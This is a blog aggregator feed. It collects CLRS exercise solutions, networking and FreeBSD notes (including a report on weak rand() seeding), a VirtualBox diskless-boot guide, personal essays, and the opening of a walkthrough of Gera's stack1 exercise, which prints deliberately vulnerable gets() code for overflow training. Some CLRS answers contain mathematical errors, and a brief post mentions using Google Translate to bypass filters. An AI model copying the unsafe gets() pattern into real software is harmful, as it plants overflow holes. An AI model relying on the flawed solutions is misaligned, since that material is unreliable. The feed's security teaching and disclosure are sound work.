    You can use $h(k)$ to create a bloom filter of strings in the linked list. This is an $\Theta(1)$ check to determine if it is possible that a string appears in the linked list.

    Additionally, you can create a hash table of pointers to elements in the linked list with that hash value. this way you only check a subset of the linked list. Alternatively, one can keep the hash of the value stored in the linked list as well and compare the hash of the search value to the hash of each item and only do the long comparison if the hash matches.

    Question 11.3-2:

    Suppose that a string of length $r$ is hashed into $m$ slots by treating it as a radix-128 number and then using the division method. The number $m$ is easily represented as a 32 bit word but the string of $r$ character treated as a radix-128 number takes many words. How can we apply the division method to compute the hash of the character string without using more than a constant number of words outside of the string itself?

    Instead of treating the word as a radix-128 number some form of combination could be used. For example you may add the values of each character together modulus 128.

    Question 11.3-4:

    Consider a hash table of size $m = 1000$ and a corresponding hash function $h(k) = \lfloor m (k A \mod{1})\rfloor$ for $ A = \frac{\sqrt{5} - 1}{2}$ Compute the locations to which the keys 61, 62, 63, 64, 65 are mapped.

    1. This is required because it is possible that the random garbage in the array points to the stack by random chance
    2. unused slots not shown

    by Eitan Adler ( at October 31, 2012 12:44 PM

    Blogging my way through CLRS section 3.1 [part 5]

    Part 4 here.
    I wrote an entire blog post explaining the answers to 2.3 but Blogger decided to eat it. I don't want to redo those answers so here is 3.1:
    For now on I will title my posts with the section number as well to help Google.

    Question 3.1-1: Let $f(n)$ and $g(n)$be asymptotically non-negative functions. Using the basic definition of $\theta$-notation, prove that $\max(f(n) , g(n)) \in \theta(f(n) + g(n))$ .

    CLRS defines $\theta$ as $\theta(g(n))= \{ f(n) :$ there exists some positive constants $c_1, c_2$, and $n_0,$ such that $0 \leq c_1g(n) \leq f(n) \leq c_2g(n)$ for all $n \geq n_0\}$ Essentially we must prove that there exists some $c_1$ and $c_2$ such that $c_1 \times (f(n) + g(n)) \leq \max(f(n), g(n)) \leq c_2 \times (f(n) + g(n))$ There are a variety of ways to do this but I will choose the easiest way I could think of. Based on the above equation we know that $\max(f(n), g(n)) \leq f(n) + g(n)$ (as f(n) and g(n) must both me non-negative) and we further know that $\max(f(n), g(n))$ can't be more than twice f(n)+g(n). What we have then are the following inequalities: $$\max(f(n), g(n)) \leq c_1 \times (f(n) + g(n))$$ and $$c_2 \times (f(n) + g(n)) \leq 2 \times \max(f(n), g(n))$$ Solving for $c_1$ we get 1 and for $c_2$ we get $\frac {1} {2}$

    Question 3.1-2: Show for any real constants $a$ and $b$ where $b \gt 0$ that $(n+a)^b \in \theta(n^b)$
    Because $a$ is a constant and the definition of $\theta$ is true after some $n_0$ adding $a$ to $n$ does not affect the definition and we simplify to $n^b \in \theta(n^b)$ which is trivially true

    Question 3.1-3: Explain why the statement "The running time of $A$ is at least $O(n^2)$," is meaningless.

    I'm a little uncertain of this answer but I think this is what CLRS is getting at when we say a function $f(n)$ has a running time of $O(g(n))$ what we really mean is that $f(n)$ has an asymptotic upper bound of $g(n)$. This means that $f(n) \leq g(n)$ after some $n_0$. To say a function has a running time of at least g(n) seems to be saying that $f(n) \leq g(n) \And f(n) \geq g(n)$ which is a contradiction.

    Question 3.1-4: Is $2^{n+1} = O(2^n)$? Is $2^{2n} = O(2^n)$?

    $2^{n+1} = 2 \times 2^n$. which means that $2^{n+1} \leq c_1 \times 2^n$ after $n_0$ so we have our answer that $2^{n+1} \in o(2^n)$ Alternatively we could say that the two functions only differ by a constant coefficient and therefore the answer is yes.

    There is no constant such that $2^{2n} = c \times 2^n$ and thefore $2^{2n} \notin O(2^n)$

    Question 3.1-5: Prove that for any two functions $f(n)$ and $g(n)$, we have $f(n) \in \theta(g(n)) \iff f(n) \in O(g(n)) \And f(n) \in \Omega(g(n))$

    This is an "if an only if" problem so we must prove this in two parts:

    Firstly, if $f(n) \in O(g(n))$ then there exists some $c_1$ and $n_0$ such that $f(n) \leq c_1 \times g(n)$ after some $n_0$. Further if $f(n) \in Omega(g(n))$ then there exists some $c_2$ and $n_0$ such that $f(n) \geq c_2 \times g(n)$ after some $n_0$.

    If we combine the above two statements (which come from the definitions of $\Omega$ and O) than we know that there exists some $c_1, c_2, and n_0,$ such that $c_1g(n) \leq f(n) \leq c_2g(n)$ for all $n \geq n_0\}$

    We could do the same thing backward for the other direction: If $f(n) \in \theta(g(n))$ then we could split the above inequality and show that each of the individual statements are true.

    Question 3.1-6: Prove that the running time of an algorithm is $\theta(g(n)) \iff$ its worst-case running time is $O(g(n))$ and its best case running time $\Omega(g(n))$.
    I'm going to try for an intuitive proof here instead of a mathematical one. If the worst case is asymptotically bound above in the worst case by a certain function and is asymptotically bound from below in the best case which means that the function is tightly bound by both those functions. f(n) never goes below some constant times g(n) and never goes above some constant times g(n). This is what we get from the above definition of $\theta(g(n)))$ A mathematical follows from question 3.1-5.

    Question 3.1-7: Prove that $o(g(n)) \cap \omega(g(n)) = \varnothing$

    little o and little omega are defined as follows: \[o(g(n)) = \{ f(n) : \forall c > 0 \exists n_0 \text{such that } 0 \leq f(n) \leq c \times g(n) \forall n \gt n_0\] and \[\omega(g(n)) = \{ f(n) : \forall c > 0 \exists n_0 \text{such that } 0 \leq c \times g(n) \leq f(n) \forall n \gt n_0\]

    In other words

    $$f(n) \in o(g(n)) \iff \lim_{n \to \infty} \frac {f(n)} {g(n)} = 0$$ and $$f(n) \in \omega(g(n)) \iff \lim_{n \to \infty} \frac {f(n)} {g(n)} = \infty$$

    It is obvious that these can not be true at the same time. This would require that $0 = \infty$

    by Eitan Adler ( at October 31, 2012 12:44 PM

    Blogging my way through CLRS [part 4]

    Part 3 here This set is a bit easier than last time.
    Question 2.2-1:Express the function $$\frac{n^3}{1000} - 100n^2 - 100n + 3$$ in terms of $\Theta$ notation
    A function g(x) is said to be in the set of all functions $\Theta(x)$ if and only if g(x) is also in the set of all functions $\Omega(x)$ and in the set of all functions $O(x)$.
    Symbolically: $$g(x) \in \Theta(x) \iff g(x) \in O(x) \And g(x) \in \Omega(x)$$

    A function g(x) is in the set of all functions $\Theta(x)$ if and only if after some constant $c$ it is always true that for some constant C, $g(x) \lt Cf(x)$

    A function g(x) is in the set of all functions O(x) if and only if after some constant $c$ it is always true that for some constant C, $g(x) \gt Cf(x)$

    With our function we could choose practically any function to satisfy either one of these conditions. However we need to satisfy both of them. One thing that makes this easier is that it only has to be true after some constant number. This allows us to throw away the "trivial" parts that are eventually overwhelmed by the faster growing terms. We therefore are only left with $n^3$, which is the answer.

    Question 2.2-2: Consider sorting n numbers stored in an array A by first finding the smallest element and exchanging it with the element in A[1], then find the second smallest element and exchange it with A[2], and continue this for the first n-1 elements of A. Write the pseudocode for this algorithm, which is known as Selection Sort. What loop invariant does this algorithm maintain? Why does it need to run only for the first n-1 elements and not for all n? Give the best case and worst case running times in $\Theta$ notation
    This question is asking us to analyze selection sort in a variety of ways. I will start with writing out the pseudocode: for $j \leftarrow 1$ to $n-1$
       min $\leftarrow$ j
       for $i \leftarrow j+1$ to $n$
         $\rhd$ if A[i] < A[min] then min $\leftarrow$ i
       $\rhd$ if min $\neq$ j then swap A[min] and A[j]
    A loop invariant that this algorithm maintains is that every elements prior to A[j] is sorted among the subarray A[1] to A[j] and is less than or equal to every element in the subarray A[j+1] to A[n]. I do not believe a stronger loop invariant is provable. The algorithm only needs to run until n-1 because of the second part of the loop invariant. When $j = n-1$ we know that every element after A[j], which is A[n] is not less than all previous elements. Therefore no check has to be done. In the best case (an already sorted array) and in the worst case (a reverse sorted array) the running time is the same: $\Theta(n^2)$
    Question 2.2-3: Consider linear search again. How many elements of the input sequence need to be checked on average, assuming that the element being searched for is equally likely to be any element in the array? How about in the worst case? What are the average-case and worst-case running times of linear search in $\Theta$ notation?
    The best case for a linear search algorithm is when the searched-for element is in the first location. In the worst case all n locations must be searched. In the average case $\frac{n}{2}$ locations have to be searched.
    Question 2.2-4: How can we modify almost any algorithm to have a good best-case running time?
    I have no idea what this question is asking for. I guess checking for the optimal case (as in a pre-sorted array for a sorting algorithm) and then skipping the rest of the procedure might work.

    by Eitan Adler ( at October 31, 2012 12:44 PM

    Blogging my way through CLRS [3/?]

    part 2 here
    According to wikipedia Introduction to Algorithms is also known as CLRS which is shorter (and more fair to the other authors) so I'll use that name for now on.

    Question 2.1-1 asks me to redraw a previous diagram, but with different numbers. I am not going to post that here.
    Question 2.1-2Rewrite the insertion sort procedure to sort into nonincreasing instead of nondecreasing order:
    Here is the pseudocode of the nonincreasing version of insertion sort: for j $ \leftarrow 2$ to length[A]
      do key$ \leftarrow A[j]$
         $\rhd$ Insert A[j] into sorted sequence A[1..j-1]
        $ i \leftarrow j - 1$
        while $i \gt 0$ AND $A[i] \lt key$
          do $A[i+1] \leftarrow A[i]$
             $i \leftarrow i - 1$
        $A[i+1] \leftarrow key$

    Now we prove that this loop correctly terminates with a nonincreasing array to about the same level of formality as the book proved the original.
    Initialization: At the first iteration, when $j=2$ the subarray A[1..j-1] is trivially sorted (as it has only one element).
    Maintenance: In order to prove maintenance we need to show that the inner loop correctly terminates with an array with "space" for the correct element. As CLRS did not prove this property, I will also skip this proof.
    Termination: this loop terminates when j > length[A] or when $j = length[A]+1$. Since we have "proven" (to some level) the maintenance of the loop invariant (that at each point during the loop the subarray [1..j-1] is sorted) we could substitute length[A]+1 for $j$ which becomes [1..length[A]] or the entire array.
    This shows that the loop terminates with a correctly sorted array.
    Question 2.1-3:
    Input:A sequence of $n$ numbers $A = {a_1,a_2,...,a_n}$ and a value $v$.
    Output: An index i such that $v = A[i]$ or a special value $\varnothing$ (NIL) if $v \notin A$
    Write the pseudocode for Linear Search, which scans through the sequence looking for $v$. Using a loop invariant, prove that your algorithm is correct.
    The first part, writing the pseudocode, seems fairly easy:
    $r \leftarrow \varnothing$
    $j \leftarrow 1$ to length[A]
       if $v = A[j] \rhd$ optionally check that $r = \varnothing$
         $r \leftarrow j$
    return $r$

    The second part, proving that this is correct is harder than before because we don't have a trivially true initialization of our loop invariant.
    Initialization: $j = 1\ \And\ r = \varnothing$ at the start of our loop. At this point there are no elements prior to A[j] and we have yet to find $v$ in A. As such our invariant (that r will contain the correct value) is true.
    Maintenance: At every point in the loop the subarray A[1..j] has either contained $v$ in which case it has been assigned to $r$ or has not contained $v$ in which case $r$ remains $\varnothing$. This means that loop invariant holds for every subarray A[1..j].
    Termination: At the end of the loop $j = $ length[A]. We know from our maintenance that $r$ is correct for every subarray A[1..j] so at termination $r$ contains the correct value
    Question 2.1-4 Consider the problem of adding two $l$-bit binary integers, stored in two $l$-element arrays $A$ and $B$. the sum of the two integers should be stored in binary form in $(l+1)$-element array $C$. State the problem formally and write pseudocode for adding the integers.
    Stating the problem formally looks something like:
    Input: Two $l$-bit integers $A$ and $B$ stored as arrays of length $l$ with the most significant bit stored last
    Output: An $l+1$-bit integer ($C$) stored as arrays of length $l+1$ with the most significant bit stored last
    Here is the pseudocode: $\rhd$ X is a $l$-bit array of bits initialized to all zeros in order to store the carry
    for j $\leftarrow$ 1 to $l$
       $C[j] \leftarrow copyC \leftarrow A[j] \oplus B[j]$
       $X[j+1] \leftarrow A[j] \And B[j]$
       $C[j] \leftarrow C[j] \oplus X[j] $
       $X[j+1] \leftarrow copyC \oplus X[j+1] $

    by Eitan Adler ( at October 31, 2012 12:44 PM

    Blogging my way through Cormen [2/?]

    As I said in part 1 I am reading a book on algorithms and have decided to blog my way through. My primary goal in doing so is to improve my writing skills. A secondary goal is to force myself to actually answer the questions.

    1.2-2 Suppose we are comparing implementations of insertion sort and merge sort on the same machine. For inputs of size n, insertion sort runs in $8n^2$ steps, while merge sort runs in $64n \lg n$ steps. For which values of $n$ does insertion sort beat merge sort?
    The question is essentially asking for which values of $n$ is $8n^{2} \lt 64n \lg n$. We can solve this question by first factoring out an $8n$ and we get $n \lt 8 \lg n$ Unfortunately this problem is not solvable using elementary operations. Luckily we are being asked for an integer solution (as computers operate in discrete steps) and we could use the underutilized guess-and-and method.
    $n$$8 \lg n$
    14 30.46
    41 42.86
    43 43.41
    44 43.675
    So there we have it: given this data we would prefer insertion sort whenever we have fewer than 43 items.
    1.2-3 What is the smallest value of n such that an algorithm whose running time is $100n^2$ runs faster than an algorithm whose running time is $2^n$ on the same machine.
    This question is asking us find the smallest positive integer $n$ that satisfies $100n^{2} \lt 2^n$. This could be solved by doing the math, by looking at a plot of the curves, or using the above method again. . $$2^{14} = 16384$$ $$(100 \times 14^{2}) = 19600$$ $$2^{15} = 32768$$ $$(100 \times 15^{2}) = 22500$$
    An exponential algorithm becomes far worse than a polynomial algorithm when we have only 15 items to worry about. In other words: avoid exponential algorithms!
    Thank you JT and JM for giving me the idea to go through the book, and for looking at my posts before I publish them.
    Updated 2012-09-05: I had a brain lapse the day I originally published this and accidentally used the natural logarithm instead of the base 2 log for question 1.2-2. How I ever managed to do that I will not know, but I've fixed it.

    by Eitan Adler ( at October 31, 2012 12:44 PM

    Google translate proxy no longer available

    One old trick to bypass simple domain based filters was to use Google translate on the domain and go from English to English (or the native language to the native language - whatever it might be).

    I recently came across a link that happen to be using Google translate in that way a (I'm not sure why) and I got an error from Google

    "Translation from English into English is not supported."

    When I tried with other languages I got similar errors. Translating to other languages works as usual.

    Luckily this trick is not really needed as there are thousands of available proxies or one could just make their own.

    by Eitan Adler ( at October 31, 2012 11:56 AM

    Cneonction: closed HTTP header

    When you make a request to certain websites you may find an unusual header that looks a little strange:

    [8000 eitan@radar ~ ]%curl -I 2>/dev/null|grep close
    Cneonction: close
    [8001 eitan@radar ~ ]%curl -I 2>/dev/null|grep close
    Cneonction: close

    This isn't a typo though. Some load balancers that sit between the web server and end user want to implement HTTP keep-alive without modifying the back end web server. The load balancer therefore has to add "Connection: Keep-Alive" to the HTTP header and also has to elide the "Connection: close" from the real webserver. However, if it completely removes the line the load balancer (acting as a TCP proxy) would have to stall before forwarding the complete text in order to recompute the TCP checksum. This increases latency on packet delivery.

    Instead, the proxy uses a hack to keep the checksum unchanged. The TCP checksum of a packet is the 1s complement summation of all the 16 bit words (the final word might be right padded with zeros).[1] By manipulating the ordering, but not the content of the header the proxy can avoid changing the TCP checksum except by the fixed amount that the "Connection: Keep-Alive" adds (2061).

    In particular:

    >>>sum(ord(i) for i in "Connection") - sum(ord(i) for i in "Cneonction")


    This reordering also keeps the packet size the same.

    1. RFC793
    Edit 2012-10-31: Make the RFC a link and remove pointless "2>&1"
    Thanks abbe for the inspiration! Thanks wxs for the proofreading.

    by Eitan Adler ( at October 31, 2012 11:45 AM

    October 23, 2012

    Nate Berry

    Ubuntu breathes new life into old MacBook

    Last year when I got an HP EliteBook for work I thought my days with the old MacBook were numbered. The MacBook isn’t that old, its a 2009 Core 2 Duo aluminum body 13″ model, but the EliteBook’s iCore 5 was is faster. The Mac screen is better, but not by very much. Both processors […]

    by Nate at October 23, 2012 11:27 PM

    October 21, 2012


    Drush: the Drupal shell utility

    Drush while not strictly a module, is listed on as a module for lack of a better classification. Drush is a set of shell scripts that can be used to better manage drupal installations because it actually does a limited bootstrap of the drupal environment, connecting to the database that it finds available in the nearest settings.php file.


    by lipcpro at October 21, 2012 12:59 AM

    October 20, 2012


    Drupal Best Practices (or just good ideas)

    My notes from a presentation I gave at the meeting

    Q. Why Is it important to practice good programming habits?

    A. Following best practices, and thoughtful planning from the beginning, will ensure a well received project outcome, limiting mistakes while speeding development.

    by lipcpro at October 20, 2012 06:52 PM

    October 10, 2012

    Eitan Adler

    Reduced Entropy in rand() and random()

    TL;DR: Don't rely on undefined behavior, even when you think it should work.

    I recently reported a minor issue to the FreeBSD security team.

    The libc random functions had code1,2 designed to run when /dev/random is not available. This can easily occur in a chroot or jail environment.

    if (!done) {
    struct timeval tv;
    unsigned long junk;

    gettimeofday(&tv, NULL);
    srandom((getpid() << 16) ^ tv.tv_sec ^ tv.tv_usec ^ junk);

    This code is designed provide a minimal amount of entropy in the "failure" case. Unfortunately, it doesn't even provide the entropy it claims to. This is a minor issue because getpid, getimeday, and a single long variable don't provide a lot of entropy in the first place: (only $log_2{sizeof(long)}$ bits).

    The point of the junk value is to add entropy by using uninitialized memory. This relies on the compiler being "stupid" enough not optimize it away.

    Unfortunately clang and newer versions of gcc are smart enough to use the undefined behavior in undesired ways.

    clang 3 removes any computation which relies on the undefined behavior and so produces the following object code:

    af0: e8 5f fc ff ff callq 754 <gettimeofday@plt>
    af5: e8 7a fc ff ff callq 774 <getpid@plt>
    afa: e8 65 fc ff ff callq 764 <srandom@plt>

    Note that the junk variable is entirely unused and that the xor operation between gettimeofday and getpid is non-existent.

    gcc 4.6 4 outputs:

    ce8: e8 03 fa ff ff callq 6f0 <gettimeofday@plt>
    ced: e8 4e fa ff ff callq 740 <getpid@plt>
    cf2: 48 8b 7c 24 08 mov 0x8(%rsp),%rdi
    cf7: 48 33 3c 24 xor (%rsp),%rdi
    cfb: c1 e0 10 shl $0x10,%eax
    cfe: 48 98 cltq
    d00: 48 31 c7 xor %rax,%rdi
    d03: e8 28 fa ff ff callq 730 <srandom@plt>
    Note that in this case the junk value appears to be (%rsp) which isn't all that random.

    gcc 4.25 produces the following code

    with the junk variable

    d9f: e8 18 fa ff ff callq 7bc <gettimeofday@plt>
    da4: e8 43 fa ff ff callq 7ec <getpid@plt>
    da9: 48 8b 3c 24 mov (%rsp),%rdi
    dad: 48 33 7c 24 08 xor 0x8(%rsp),%rdi
    db2: c1 e0 10 shl $0x10,%eax
    db5: 48 98 cltq
    db7: 48 31 c7 xor %rax,%rdi
    dba: 48 31 df xor %rbx,%rdi
    dbd: e8 1a fa ff ff callq <srandom@plt>
    and without:

    d9f: e8 18 fa ff ff callq 7bc <gettimeofday@plt>
    da4: e8 43 fa ff ff callq 7ec <getpid@plt>
    da9: 48 8b 3c 24 mov (%rsp),%rdi
    dad: 48 33 7c 24 08 xor 0x8(%rsp),%rdi
    db2: c1 e0 10 shl $0x10,%eax
    db5: 48 98 cltq
    db7: 48 31 c7 xor %rax,%rdi
    dba: e8 1d fa ff ff callq 7dc <srandom@plt>

    The base version of gcc isn't vulnerable. However, with the upcoming switch to the clang compiler the FreeBSD does become vulnerable.

    The first proposed fix was to add the volatile type qualifier to the junk variable. While this seemed to fix the code generation issue I didn't believe this to be a valid fix as the behavior is still undefined6 (I misread text of the standard). Additionally, the value is likely have be very predictable. A preference was expressed to remove the junk variable as using it may leak a small amount of stack data.

    I proposed the simple and obvious fix of removing the use of the junk variable7

    In a brief survey of other libraries I noticed similar issues. I will attempt to notify the vendors

    It should be obvious, but undefined behavior is undefined and can't be relied on to ever to give a sensible result.

    1. random.c r165903 (line 316)
    2. rand.c r241046 (line 131)
    3. FreeBSD clang version 3.1 (branches/release_31 156863) 20120523 compiled with -O2 or -O3
    4. gcc46 (FreeBSD Ports Collection) 4.6.4 20120608 (prerelease) compiled with -O2
    5. gcc (GCC) 4.2.1 20070831 patched [FreeBSD] compiled with -O3
    6. sections and of ISO9899
    7. svn commit r241373
    Edit 2010-10-10: update the paragraph referring to undefined behavior of volatile.

    by Eitan Adler ( at October 10, 2012 09:08 AM

    October 09, 2012

    Eitan Adler

    Some git-svn notes

    When working with a subversion repository I often miss the use git features. However, it is possible for git to speak the subversion protocol:

    Cloning the initial repository

    $git svn clone svn://

    Resuming an interrupted git svn clone

    It is really annoying when you start a git svn clone process overnight and come back to find that it stopped in the middle. Luckily, there is a really simple way to recover - without spending hours to redownload what you already have.

    $git svn fetch
    $git svn rebase

    Committing the final patch

    There are a lot of workflows for this, but I prefer the cherry-pick approach:

    $git checkout master
    $git svn rebase
    $git cherry-pick commit-id
    $git svn dcommit

    by Eitan Adler ( at October 09, 2012 11:56 AM

    NFS Mount Network Booting VirtualBox

    In order to test modifications to the FreeBSD kernel, I would like to boot a diskless virtual machine. The goal is to be able to quickly test changed I make without needing to recreate the VM each time, or run the installation procedure inside of the VM.

    You can elect to put the root anywhere you want. For this example, I will be using /home/vm as the root of the virtual machine.

    There are a few aspects to this:

    • The filesystem that will be booted.
    • VirtualBox setup
    • Virtual machine setup
    • DHCP server
    • Host setup

    Filesystem Installation

    1. Create the distribution:

      cd /usr/src
      make installworld installkernel distribution DESTDIR=/home/vm
    2. Create the /conf directory used for diskless boot. See /etc/rc.initdiskless for details.

      # cd /home/vm/
      # mkdir -p conf/base/etc
      # cd conf/base/etc
      # cat diskless_remount
      # cat fstab
      md /tmp mfs -s=30m,rw 0 0
      md /var mfs -s=30m,rw 0 0
      # cat md_size

    VirtualBox Setup

    Create a "host-only" interface with DHCP disabled. To do this:

    1. Open up the preferences screen and go the "network" tab.
      screenshot of the preferences screen
    2. Create a new host-only network (the green plus on the right).
      screenshot of the network preferences screen
    3. Disable the DHCP Server.
      screenshot of the host only network DHCP screen
    4. Select an IP Address in the range your VM will have.
      screenshot of the host only network preferences screen
    5. Note that the DHCP server will continue to run until killed or the machine rebooted:

      ## Note that you may kill too much here. Be careful.
      # pgrep -fl DHCP
      # pkill -15 DHCP

    Create the Virtual Machine

    1. Create a new virtual machine. Make sure to select "FreeBSD - 64 bit". Note that you should create this machine without any disk (and ignore the warning at the end).
      filled in machine name and type screenshot
    2. Open up the virtual machine's settings
      default settings screenshot
    3. Select only the "Network" option under boot order (System->Motherboard->Boot Order). Also check "Hardware clock in UTC time."
      changed setting screen screenshot
    4. Under network select the Host Only Adapter created before. Under advanced options, change the adapter type to "PCNet-PCI II." Also make a note of the mac address of the virtual machine. It will be needed later.
      changed network setting screen screenshot

    DHCP Server

    For simplicity I opted to use a really simple DHCP server dnsmasq:
    1. Install dnsmasq

      $ make -C /usr/ports/dns/dnsmasq install clean
    2. Configure dnsmasq to server as a tftp and DHCP server for the virtual machine interface. Modify /usr/local/etc/dnsmasq.conf (I've bolded the parts that are configuration specific):

      #Note that this mac address is the mac address of the vm noted earlier.
    3. Add this to /etc/dhclient.conf so that you can reference your virtual machine by name:

      precede domain-name-servers;

    Host Setup

    1. Add the following to /etc/rc.conf:

      # Required for VirtualBox

      # Required for diskless boot

      # NFS Exports
    2. Add the directory to /etc/exports:

      /home/vm -ro -alldirs -network -maproot=root

    Now you are all set. Just boot the virtual machine from VirtualBox and watch it go!

    1. Note that the network is RFC 1918 private address space.

    by Eitan Adler ( at October 09, 2012 11:56 AM

    September 26, 2012


    Hypnotoad SVG

    Hypnotoad is all over the internet. By in large depicted in tiny animated gifs with horrible compression artifacts and other flaws. Behold hypnotoad in its full glory, a lossless animated svg format. You can now scale hypnotoad to unimaginable dimentions without doing it injust - ALL GLORY TO THE HYPNOTOAD


    by dotCOMmie at September 26, 2012 02:47 AM

    February 18, 2012

    Nate Berry

    Super Star Trek in Python

    OK kids, make sure you have python installed so you can fire photons in this python remix of the classic Fortran Super Star Trek classic terminal game from the mid 70s. I played this game (poorly) in High School and had gotten frustrated trying to run the original Fortran version some while ago. Turns out […]

    by Nate at February 18, 2012 09:03 PM

    February 06, 2012

    Nate Berry

    Superbowl for paying customers only

    OK, so I’m not a sports fan, but I admit that I did *try* to watch the superbowl since its supposedly the American thing to do. Since I don’t pay for cable TV at $100 a month, I don’t get any of those cable channels showing the game, but thought I’d be able to get […]

    by Nate at February 06, 2012 01:51 AM

    February 01, 2012

    John Lutz

    Love is Not.

    Love is Not.
    Love is not usually something you discuss, but for all intents and purposes it can be best explored by what it is not. Remember, this is no definition, but merely a guideline of observation and experience in this Life.

    Love is not Wisdom. No one defines Love in a book, or yet in the smallest of sayings or even this article. It goes far beyond the hottest potential of that which burns and has no limit in it's temperature.

    Love is not Symbolization. Love cannot be contained in or evoked through a word, a letter, a Book or in some manner of Symbol that is bound or not bound by this Earthly Sphere.

    Love is not Complex. A Hymn or Chant may prevent mental disturbance but Love is no where in site.

    Love is not Life. All Life is not Love, but is supported as such. Freewill let's you choose. The fallen know this.

    Love is not Man. It cannot be tied down to just one type of life form. There are many sentient beings , even just here on Earth, that are not just Homo Sapien who practice love, even for Man, himself. It can be also noted that Man was also not just Homo Sapien in his/her history as well.

    Love is not Power. Partially speaking, Love can be powerful thing, but it does not support a dominion over others or anything else.

    Love is not Joy. Cause and effect. Don't confuse the two.

    Love is not Glory. You can have two much Glory, but not enough Love.

    Love is not a Feast. Promised a feast is only a simple tie of the knot of your biological needs. If an Elephant or Dolphin or Whale or Other who is Sentient and you eat one, does this constitute Love?

    Love is not the rendition of Money or goods. Money isn't even form, it changes, it is superfluous, and as such can be used for the ten million thousand evils at Man's hand.

    Love is not by Command or Talent. If someone knows when a good day to wear Jeans is or perhaps when the right time to snap their fingers is; Love never takes this into account.

    Love is not Partial. If Love was partial to, say a certain type of friendly person, there would be no balance. Thus War.

    Love is not All things. Life is all, through the support of Love. But most things can turn, invert in on itself and destroy the Love of that which is.

    Love is not Control. By definition of retention, Union is destroyed. There is only Control where there is Chaos.

    Love is not Respect. While some Respect may be Loving; it has many forms. Respect is not required for Love.

    Love is not Spirituality. Each of us has a spirit, even the most thesis to what we know as Not Love.

    Love is not an Institution. No matter where you go there you are.

    I devote this to my Mom.
     -John L

    by JohnnyL ( at February 01, 2012 07:16 AM

    January 31, 2012

    John Lutz

    Earth: Our Home

    Here is a simple guideline you can use in your daily life in working together in harmony with the planet.

    * Recycle
    recycle as much as you can, it's easy. the only payment you make is temporary room for items before they get shipped out to the appropriate retainer.

    More than likely it's usually a choice between (everyday wear and tear):

    * Cardboard (includes paper)
    * Plastic

    I find that while consuming these two materials are most prevelant.
    Cardboard is from tree pulp, Plastic has the lifetime of thousands of years, when it finally degrades it'll be in the form of small pellets (nondecomposable)

    Unusually you'll be dealing with:
    * Electronics
    * Metal
    * Styroform
    * Clothing
    * Wood

    things such as wood and cloth degenerate, so no need to worry about them till the last. the clothing should be used as rags before throwing out. is a good place to start for salvaging
    everything from paint to computers/electronics/monitors.

    If you only have a phone: 1-800-CLEANUP.

    * drive less (think ahead). If you notice all the people out driving during working hours and haven't asked yourself the question why, it's because we are all consuming. By this we are denegrating our planet. Think about your planet. We are the stewards and have the responsibilty of protecting it.

    * See if it's possible with your company to telecommute (i know this may be hard but if your invested or with more years onboard it's alot easier. Many jobs are applicable in this form. This especially holds true if you commute 1 1/2 hours to work and don't talk to anyone there. (Otherwise known as common Information Technology work.)
    * If you can, try to move close to your work, while unrealistic it's a small goal, that if you can make will help out tremendously.

    * be ware of the elements, it's a good idea to get a container for oil if your changing it and . That mean's not dumping it vacariously.

    * use less: the more you use the more you abuse, try to make sure the appropriate amount of material is used for the job, not any more. that includes just about ever resource you can think of.

    * Electricity may be seemingly ubiquitus, but it still puts strain on the carrying equipment, not to mention your wallet. Use only what you need. A good habit is to turn off the lights everytime you leave a room.

    * Computer use up many watts, especially the new models, the more components you have the more electricity is used. If it recommended that you use power saving capabilities of the computer and always shut it off at night.

    * buy less: A majority of the stuff which is bought can last longer if one . Earth is not a fad. If it works use it, if you don't have enough to make yourself optimal buy it, but make it last.

    * Portable devices: These are good if you have a disability and you cannot retain information! They usually wind up in the dump and typically you'll loose the information because the batteries go dead!

    Contact the email address below if you want more information on how to get rid of those portable machines and their batteries for good. (And yes, for many the computer is just a crutch)

    * Dining. If you like playing russion roulette with what you consume physically then you like to dine out! If available ask for a content chart(taco bell and mcdonald's have these suprisingly). A good suggestion is just to buy from the supermarket. It's also wise to become a vegatarian. Many famous people like Einstein and Leonardo De Vinci supported vegetarianism. Many of the meat that you eat will make you become sluggish and add health problems (apart from smoking and taking drugs, eating meat is the one thing that new Doctors ask you when you first sign up with them). Vegatables and fruits get there energy from the primary source; the Sun. Be wise with what you injest. A majority of the meat raising and milk cuddling is from harsh and violent environments that leave our animals in terror. which you eventually injest. If you do buy milk, buy organic. Same with eggs too.

    If you would like to add to this guideline sheet or help inform others on conververation for the planet , then by all means do so. (c) copyright 2007 John Lutz. If you have any questions or would just like to talk please contact me at: JohnnyLutz[[at]]

    "By helping the Earth, you help yourself."

    by JohnnyL ( at January 31, 2012 09:43 AM

    August 24, 2011


    Installing and using egit, the eclipse git plugin

    I use the latest PDT version of eclipse (Helios) as my IDE of choice, and have used the built-in cvs and add-on svn-kit plugins for version control for many years. When I first started using git, I guess I didn't think there was a git plug-in for eclipse or that the ones I saw just weren't stable enough, so I just went to the command line to do the git work then back to eclipse to continue coding. Now that Drupal has moved their whole repository from cvs to git, I thought it might be time to add the e-git plug-in to eclipse so that I don't have to leave eclipse to get git work done.


    by lipcpro at August 24, 2011 03:54 PM

    June 25, 2011

    Eitan Adler

    Gera's Insecure Programming: Warming up to the stack #1

    Gera has a series of "challenges" designed to help teach people the basics of exploitation. The goal is to provide some input to the program to get it to output you win!"

    The code for the first one
    * stack1.c
    * specially crafted to feed your brain by gera
    int main() {
       int cookie;
       char buf[80];
       printf("buf: %08x cookie: %08x\n", &buf, &cookie);
       if (cookie == 0x41424344)
          printf("you win!\n");

    At a lower level
    The assembly for the above program generated by clang on FreeBSD with -O3 -fomit-frame-pointer (comments are my addition)
       pushl %esi
       subl $100, %esp
       leal -8(%ebp), %eax
       movl %eax, 8(%esp)
       leal -88(%ebp), %esi
       movl %esi, 4(%esp)
       movl $.L.str, (%esp)
       call printf
       movl %esi, (%esp)
       call gets      ; note that gets does not have a length argument
       cmpl $1094861636, -8(%ebp)
       jne .LBB0_2    ; we will come back to this
       movl $str, (%esp)
       call puts
       xorl %eax, %eax
       addl $100, %esp
       popl %esi

    Break it down
    The program starts off by creating two variables: a cookie and a fixed size buffer. It then prints out the address of buf and cookie
    Then the fun starts: gets(3) is called to put data in buf. gets is a very insecure function. To quote the man page:
    The gets() function cannot be used securely. Because of its lack of bounds checking, and the inability for the calling program to reliably determine the length of the next incoming line, the use of this function enables malicious users to arbitrarily change a running program's functionality through a buffer overflow attack.
    Then we have a check to see if cookie is equal to some value. We can convert this value from an integer to printable ascii(7) characters. 0x41is A, 0x42 is B, etc. So we want to set the cookie to "ABCD". There is one little gotcha: The machine I'm using (and most you probably are) is little endian so we actually need to reverse the order of our text.
    What should we actually do?
